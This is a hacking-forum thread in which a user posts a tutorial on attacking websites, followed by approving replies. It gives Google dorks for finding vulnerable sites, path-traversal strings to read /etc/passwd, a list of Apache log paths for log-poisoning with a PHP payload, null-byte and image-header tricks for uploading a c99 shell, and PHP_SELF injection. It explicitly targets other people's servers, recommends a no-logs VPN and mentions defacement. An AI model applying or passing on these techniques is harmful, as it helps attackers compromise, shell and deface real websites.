chevron_left chevron_right
Login Register invert_colors photo_library
Thread Rating:
  • 2 Vote(s) - 3 Average


filter_list Tutorial Advanced Hacking Techniques
Author
Message
Advanced Hacking Techniques #1
// Advanced Hacking Techniques //



Contents:
  • Intro
  • Tools You Need
  • Local File Inclusion (LFI) with Log Poisioning
  • Cookie Poisioning
  • Unrestricted File Upload and Filter Bypass
  • Exploiting $_SERVER['PHP_SELF']
  • Conclusion




// Intro //

Spoiler: Large Image Alert!
[Image: Attacks.png]
Hello, @APPLEZ here. Some of you may know me as 0verlord, but you can call me either one. I've decided to share with you some of my personal favorite exploits. Enjoy!


As a web developer, you must be extremely careful as you code. If you forget to sanitize only one field or input on your site, it could be fatal. These are only a few of my favorite exploits, I find them very fun to accomplish. If you would like me to do a tutorial on any other exploits, please post below! Another noteworthy comment: If you do actually get a server shelled, and a website administrator deletes it, don't worry! Odds are, they don't even know how you got it there in the first place; a whopping 63% of website owners don't even know how you did it. Lets continue on, but please keep in mind Sinister.ly nor I am responsible with what you do with this information, it's for educational purposes ONLY!


// Tools You Need //
  • Firefox
  • Tamper Data
  • Live HTTP Headers
  • A Badass Theme for Firefox
  • A VPN (Not a free vpn, a vpn with NO LOGS like http://privateinternetaccess.com)
  • Your favorite php shell

    // Local File Inclusion (With Log Poisoning) //
    This is my favorite exploit, by far. The goal of this is to first find the path of the error log, generate an error within the server with a spoofed user agent with your php payload, then finally access the log file and your php payload will execute, allowing you to upload a shell, exploit kit, or simply deface the website. This will not work on all sites, if you wondering. As always, details of this exploit with vary from site to site; not all sites have the same directories or log file names. Lets start by explaining the basics of LFI:

    1) Find a vulnerable site
    Here are a few LFI google dorks for you to get started:
    Code:
    inurl:contacts.php?page=
    inurl:index.php?page=
    inurl:include.php?file=
    inurl:catalog.php?catID=

    2) Test for vulnerability
    You've found a site with a URL similar to this:
    Code:
    http://www.website.com/index.php?catID=23&file=index.php

    You now need to edit the URL (after &file=) to look like this:
    Code:
    http://www.website.com/index.php?catID=23&file=../../../../../../../etc/passwd

    If it is vulnerable, some of the page should be replaced with some text similar to this:
    Code:
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/.......

    You may ask yourself, "HOLY SHIT! WTF HAPPENED?!?!?" The answer is simple.

    ../ tells the server you want to move up one directory. You want to move all the way up to the root directory, so you may need to add many of those.

    /etc/passwd is a file that at one time held the username and hashed password of every user on the system, but those days are gone. There's not much of a use for this file, except to test your LFI.

    You now can read any file on the server! But unless there's a particularly juicy file on the server you want to see, it may seem that LFI is pretty damn useless. That is not the case.

    3) Find an error log file
    This step is very vital to taking this exploit to the next level. An error log file may contain a persons IP, location, user-agent, and may reveal additional vulnerabilities on the site. But for out purposes, we will inject the log file with a php payload.

    Here are a few locations as to where it may be:
    Code:
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../apache/logs/error.log
    ../../../../../../.../apache/logs/access.log
    ../../../../../../../apache/logs/error.log
    ../../../../../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/acces_log
    ../../../../../../../etc/httpd/logs/acces.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log


    After you find the log file, you're golden! All you must do now is generate an error, and spoof some of the data you send to the server. For this you'll be using tamper data.


    3) Delivering the payload
    I cannot tell you every detail on how to do this; it requires trial and error (hopefully error :D ) There are numerous ways to deliver an error to a site. I'll be using SQLi to throw an error, for an example. You will be needing Tamper Data, mentioned near the beginning of the thread.

    Now, you have the SQLi vulnerability, but for this purpose we will not be exploiting it, just using it to create the error. Simply open tamper data, start the tamper, run your SQLied URL, and a pop up box will appear. Click tamper. Now, in the user-agent field, replace your user-agent with you php payload. You can simply write a script to get cmd access, an upload script, or even your entire shell (I wouldn't recommend it though). Finally, tap that submit button, smoke a joint, and celebrate your success. The last step is to navigate to the log file once more, and your php payload should be executed.



    // Cookie Poisoning //
    Here is a 7 minute video to help explain what this is, and how to exploit it. Instead of using wtfever he's using on a very old windows computer, you can use Live HTTP Headers and Tamper Data.



    Basically, some websites store some information in your cookies, which should never be allowed client sided. It's a fairly simple exploit, and takes some really noobish coding for a site to be vulnerable. This isn't limited to only changing fields in you cookie; you can also do SQLi and XSS, depending on the situation. With that being said, it's quite hard to tell you exactly what to do, since every website is most likely going to have different formats of cookies. Cookie poisoning is often overlooked; would you think someone could SQL inject your site with a mere cookie? If anyone needs additional information about this, feel free to post below with your question.



    // Unrestricted File Upload and Filter Bypass //

    Unrestricted file upload is just what it seems to be, the ability to upload any type of file, including php. There are tons of ways to do it, but I'll only review a few. This exploit is usually used in conjunction with FPD (Full Path Disclosure) to locate the file you uploaded.

    Method 1: JavaScript
    In some cases, the input is sanitized by using javascript. You should NEVER do that. To bypass, simply disable javascript on your browser.

    Method 2: The Null Byte
    You have discovered that the input is not sanitized by javascript, but by php. If only you could change the extension on you shell to a filetype accepted by the server, then make it disappear. Luckly, you CAN! The null byte, %00, makes the site disregard everything following it.
    Example:
    Code:
    c99.php.png

    changes to:
    Code:
    c99.php%00.png

    When uploaded, the .png part will be discarded. The null byte is a great tool for many types of filter bypass, including bypassing LFI filters.
    Example:
    Code:
    .%00./.%00./.%00./etc/passwd

    Method 3: File header verification
    This is where the server scans the file for its header, to identify what type of file it is. If the header matches anything in the filetype whitelist, it will be uploaded. If not, you'll have to do a little bit more work.

    Step 1:
    Lets say the server only allows png files. Using the last method, and combining it with this one, you should still be able to upload your shell. First, you need to find any png file.

    Step 2:
    Open the file with notepad++ (or another IDE). Now, copy and paste your shell at the very bottom of the file. Save the file as c99.php%00.png. The code may or may not be executed, it depends on the settings in the phpinfo.ini file. In some cases, it will work, and it's a very sneaky way of bypassing filters.



    // Exploitation of $_SERVER['PHP_SELF'] //

    $_SERVER['PHP_SELF'] is a variable in php that simply contains the current url of the webpage.
    Example:

    Current page:
    Code:
    http://website.com/penis/swag/yolo.php

    The $_SERVER['PHP_SELF'] variable contains:
    Code:
    penis/swag/yolo.php

    To exploit this, all you have to do is add your malicious code to the end of the url.
    Example:

    Code:
    http://website.com/forums/index.php <?php echo phpinfo(); ?>

    the PHP_SELF variable will contain and echo:
    Code:
    forums/index.php <?php echo phpinfo(); ?>

    Since most of the time $_SERVER['PHP_SELF'] is being echoed as an href for a button, the server will print out the directory, then print AND execute the malicious code. You can also do XSS with this.



    //Conclusion //

    If you have any questions, comments, suggestions, corrections, or concerns, feel free to either PM me or post below. If I have posted this in the wrong section, an admin will surely correct it.I hope you learned a thing or two. This thread will be revised and edited, maybe even added on to, if needed. I hope you enjoy this as much as I did!
    Thanks for reading,

    ~APPLEZ a.k.a. 0verlord <3
[Image: xbRXRHX.gif]

[+] 2 users Like APPLEZ's post
Reply

RE: Advanced Hacking Techniques #2
Very nice, very very hq!
I expect nothing less from 0verlord.
Amazing job on this tut Biggrin

I'm going to be using this a lot Biggrin
[Image: rdxQDCq.png?4477]

[+] 1 user Likes Senka's post
Reply

RE: Advanced Hacking Techniques #3
[sarcasm]You forgot to include the part about hacking ip adresses.[/sarcasm]
Nice post, I know you worked a while on it.

(Although I won't use it because I don't like hacking. Creation FTW)

[+] 1 user Likes ImmNinjaxD's post
Reply

RE: Advanced Hacking Techniques #4
Nice thread, Overlord.
I think it is the most 1337 thread i've ever seen in my life.
[Image: emduQIV.gif]
Senka (WF) Wrote:Ur black? o.0
"I don't do cocaine. I just like the way it smells" -Rucka Rucka Ali

[+] 1 user Likes Nucka_Tyler's post
Reply

RE: Advanced Hacking Techniques #5
Very HQ 0verlord. I'm sure this took hours to make Smile Dat sexy green text doe
[Image: 2dGs1ZV.png]

[+] 1 user Likes Jlyon11's post
Reply

RE: Advanced Hacking Techniques #6
Thanks guys, my brain almost melted by the time I got done Wink
[Image: xbRXRHX.gif]

[+] 1 user Likes APPLEZ's post
Reply

RE: Advanced Hacking Techniques #7
Very nice thread, very informative.
Pay respects to the malformed SYN packet.

[+] 1 user Likes The_Joker's post
Reply

RE: Advanced Hacking Techniques #8
(07-29-2014, 02:17 AM)ImmNinjaxD (⌐■_■) Wrote: [sarcasm]You forgot to include the part about hacking ip adresses.[/sarcasm]
Nice post, I know you worked a while on it.

(Although I won't use it because I don't like hacking. Creation FTW)

look a leet hacker joke

op:
>Advanced

[+] 1 user Likes superMAUS's post
Reply

RE: Advanced Hacking Techniques #9
I stopped reading when I read

../ tells the server you want to move up one directory.

../ tells the server to go back a directory. It wouldn't make sense is there were 10 "../" when /etc/passwd is only 1 directory away from the root directory.
XMPP - wrath@xmpp.jp

[+] 1 user Likes Crypt's post
Reply

RE: Advanced Hacking Techniques #10
(07-31-2014, 10:48 PM)Crypt Wrote: I stopped reading when I read

../ tells the server you want to move up one directory.

../ tells the server to go back a directory. It wouldn't make sense is there were 10 "../" when /etc/passwd is only 1 directory away from the root directory.

Going up a directory and back are the same thing

Some sites have additional folders containing the home directory, ex. if the person did not put the home directory in the root of the machine
[Image: xbRXRHX.gif]

[+] 1 user Likes APPLEZ's post
Reply






Users browsing this thread: 1 Guest(s)